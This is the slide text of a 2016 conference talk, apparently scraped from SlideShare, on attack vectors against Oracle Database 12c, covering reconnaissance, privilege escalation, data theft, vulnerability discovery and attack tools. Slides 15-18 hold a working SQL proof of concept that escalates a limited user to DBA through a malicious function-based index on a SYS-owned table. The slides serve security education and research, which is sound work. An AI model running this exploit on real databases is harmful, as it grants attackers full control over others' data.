Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Oracle Database 12c Attack Vectors

1,135 views

Published on

Presentation on Oracle 12c attack vectors at BG OUG (http://www.bgoug.org/) summer conference, 3-5June, 2016

Published in: Software
  • Be the first to comment

Oracle Database 12c Attack Vectors

  1. 1. Oracle database 12c attack vectors Martin Toshev, BGOUG, 04.06.2016
  2. 2. Who am I Software consultant (CoffeeCupConsulting) BG JUG board member (http://jug.bg) OpenJDK and Oracle RDBMS enthusiast
  3. 3. Who am I Author of Learning RabbitMQ
  4. 4. Agenda • Real world examples • Attack vectors • Attack discovery approach • Tools
  5. 5. Real world examples
  6. 6. Real world examples source: http://tech.firstpost.com/news-analysis/oracles-database-secure-even-nsa-cant-hack-us-say- larry-ellison-217341.html, 30 Jan, 2014
  7. 7. Real world examples However …
  8. 8. Real world examples Source: http://www.cnet.com/news/oracle-databases-easy-to-hack-says-researcher/ "Disable the protocol in Version 11.1 and start using older versions like Version 10g," which is not vulnerable” they didn't fix the current version, which leaves 11.1 and 11.2 still susceptible to attacks
  9. 9. Real world examples Source: http://www.joxeankoret.com/download/tnspoison.pdf/
  10. 10. Real world examples Source: http://www.itsec.gov.cn/webportal/download/2005_Search_Engine_Attack_Database.pdf Simple example: 1) https://www.google.ca/advanced_search 2) search for ‘/isqlplus’ and specify 'URL only' 3) voila
  11. 11. Real world examples Source: http://thehackernews.com/2014/08/Vulnerability-Oracle-Data-Redaction-Security.html
  12. 12. Real world examples Source: http://www.reuters.com/article/us-oracle-hackers-idUSTRE56L66D20090722 http://www.theinquirer.net/inquirer/news/1469225/oracle-databases-hacked-script-kiddies
  13. 13. Real world examples Source: http://www.dba-oracle.com/t_hackers_breaches_horror_stories.htm
  14. 14. Real world examples Source: http://www.davidlitchfield.com/Privilege_Escalation_via_Oracle_Indexes.pdf
  15. 15. Real world examples • Privelege escalation via indexes in 12c: -- from SYS: create c##autoexec user CREATE USER c##autoexec IDENTIFIED BY 123; GRANT CREATE SESSION TO c##autoexec; GRANT CREATE PROCEDURE TO c##autoexec; ALTER USER C##autoexec QUOTA 100M ON USERS; CREATE TABLE foo ( Id int ); INSERT INTO sys.foo values (100); INSERT INTO sys.foo values (50); GRANT INDEX ON foo to c##autoexec; GRANT SELECT, INSERT ON foo TO c##autoexec;
  16. 16. Real world examples • Privelege escalation via indexes in 12c: -- from c##autoexec: attempt to set the DBA role - FAILS SET ROLE DBA;
  17. 17. Real world examples • Privelege escalation via indexes in 12c: -- from c##autoexec CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE 'GRANT DBA TO PUBLIC'; COMMIT; RETURN 'FOO'; END;
  18. 18. Real world examples • Privelege escalation via indexes in 12c: -- from c##autoexec GRANT EXECUTE ON GETDBA TO public; CREATE INDEX EXPLOIT_INDEX ON SYS.FOO(C##AUTOEXEC.GETDBA('')); -- from SYSDBA SELECT * FROM sys.foo; -- from c##autoexec: SUCCESS SET ROLE DBA;
  19. 19. Attack vectors
  20. 20. Attack vectors • Let’s have a look at the high level architecture of the database …
  21. 21. Attack vectors unauthorized authorized (limited permissions) authorized (SYSDBA) OS level
  22. 22. Attack vectors • Attack vectors can originate from different sources depending on the setup (we will abstract ourselves from this criteria): – external (applications running publicly, vulnerable protocols running on the database servers, malware enabling machine access) – internal (employees with non-dba access, DBAs, OS-level users)
  23. 23. Attack vectors • Attacks from unauthorized users: – reconnaissance: • looking for application servers and database tools running on the database publicly • using search engines to find Oracle directory indices, web apps (such as isqlplus) running publicly • port scanning for well known ports (such as 1521 for the TNS listener) on target machines
  24. 24. Attack vectors • Attacks from unauthorized users: – gaining access: • exploring misconfiguration - using default credentials • exploring lack of identity policy – password brute forcing • exploring security bugs (e.g. buffer overflow enabling arbitrary command execution on the TNS listener)
  25. 25. Attack vectors • Attacks from unauthorized users: – data theft: • exploring lack of encryption leading to man-in-the-middle attacks (e.g. TNS listener poisoning or eavesdropping) – DoS/DDoS attacks: • network level DoS (e.g. excessive packets) • buffer overflow DoS (e.g. bug in the TNS listener)
  26. 26. Attack vectors • Attacks from authorized users with limited permissions: – SQL injection (typically caused by buggy applications having a DB user with excessive privileges) – DoS attacks (e.g. due to misconfiguration – excessive connections, filling shared tablespaces, running complex queries)
  27. 27. Attack vectors • Attacks from authorized users with limited permissions: – privilege escalation (e.g. via the INDEX permission) – data theft (e.g. via PL/SQL procedure injection, scheduling opening of remote socket connections to external sources)
  28. 28. Attack vectors • SYSDBA access … the world is yours • OS level access – many methods to retrieve passwords and useful data from raw Oracle database files
  29. 29. Attack discovery approach
  30. 30. Attack discovery approach • Already uncovered security bugs as the ones we discussed are fixed and released by Oracle as critical patch updates • But how to uncover new bugs and ethically report them before being discovered by attackers ?
  31. 31. Attack discovery approach • Explore new features (e.g. multitenancy) • See what parts of the security architecture of the database are in use by these features • Explore changes to the security architecture and new security features
  32. 32. Attack discovery approach • For top 12c new features (at a glance): – consolidation (pluggable databases) – redaction policy
  33. 33. Attack discovery approach • For top 12c new features (at a glance): – consolidation (pluggable databases) – resource utilization of PDBs, access boundary between PDBs, secure data replication between PDBs, discrepancies in local/common users/roles ? – redaction policy – other built-in functions/mechanisms that can reveal redacted data ? (we already saw some)
  34. 34. Attack discovery approach • For top 12c new features (at a glance): – In Line PL/SQL Functions in SQL queries – Online Migration of Table Partition or Sub Partition
  35. 35. Attack discovery approach • For top 12c new features (at a glance): – In Line PL/SQL Functions in SQL queries – bypassing security mechanism, privilege escalation ? – Online Migration of Table Partition or Sub Partition – data theft ?
  36. 36. Attack discovery approach • For top 12c new features (at a glance): – Full Database Caching – SQL translation framework
  37. 37. Attack discovery approach • For top 12c new features (at a glance): – Full Database Caching – buffer overflows, DoS, malicious in-memory data manipulation ? – SQL translation framework – malicious third-party translation plug-ins, security bugs in translation plug- ins ?
  38. 38. Attack discovery approach explore existing attacks and security bugs (e.g. use packet crafting tools to try buffer overflow attacks over enhancements of database protocols) explore vulnerability databases such as CVE for exploits and try to adapt some of them to new database features
  39. 39. Attack discovery approach make use of proper penetration testing tool such as Metasploit to adapt existing attacks for 10g/11g or older versions to 12c analyze new PL/SQL packages for security leaks disassemble Oracle binaries
  40. 40. Attack discovery approach • You may, of course, discover issues not introduced in 12c but rather propagating through multiple versions (such as the TNS poison vulnerability) …
  41. 41. Tools
  42. 42. Tools • nmap • Metasploit • Tnscmd • ODAT (Oracle Database Attacking Tool) • w32dasm/ IDA Freeware • Kali Linux
  43. 43. Tools • ODAT supports 12.1.0.2.0: – try to find valid SIDs and credentials – try to escalate valid account to DBA or SYSDBA – try to execute OS commands from a valid account
  44. 44. Some readings that may bring ideas …
  45. 45. Some readings that may bring ideas …
  46. 46. Thank you ! Q&A
  47. 47. References Oracle 12c Security whitepaper http://www.oracle.com/technetwork/database/security/security-compliance- wp-12c-1896112.pdf Oracle Database 12c architecture overview https://www.youtube.com/watch?v=266ay9N6kAw Oracle Database 12c New security Features http://www.trivadis.com/sites/default/files/downloads/soe_oracle_da tabase_12_new_security_features_summary.pdf
  48. 48. References Oracle Database 12c security http://docs.oracle.com/database/121/nav/portal_25.htm Oracle database security checklist http://www.isaca.org/groups/professional-english/oracle- database/groupdocuments/twp-security-checklist-database-1-132870.pdf Encryption and Redaction in Oracle Database 12c with Oracle Advanced Security http://www.oracle.com/technetwork/database/options/advanced- security/advanced-security-wp-12c-1896139.pdf
  49. 49. References Privelege escalation via Oracle indexes http://www.davidlitchfield.com/Privilege_Escalation_via_Oracle_Indexes.pdf Attacking Oracle with the Metasploit Framework http://www.blackhat.com/presentations/bh-usa-09/GATES/BHUSA09-Gates- OracleMetasploit-SLIDES.pdf Oracle Database TNS Listener Poison Attack http://www.joxeankoret.com/download/tnspoison.pdf
  50. 50. References ODAT (Oracle Database Attacking Tool) tool https://github.com/quentinhardy/odat Oracle Database 12c CVE vulnerabilities statistics https://www.cvedetails.com/product/467/Oracle-Database- Server.html?vendor_id=93 Oracle Database 12c CVE vulnerabilities https://www.cvedetails.com/vulnerability-list/vendor_id-93/product_id- 467/cvssscoremin-5/cvssscoremax-5.99/Oracle-Database-Server.html

×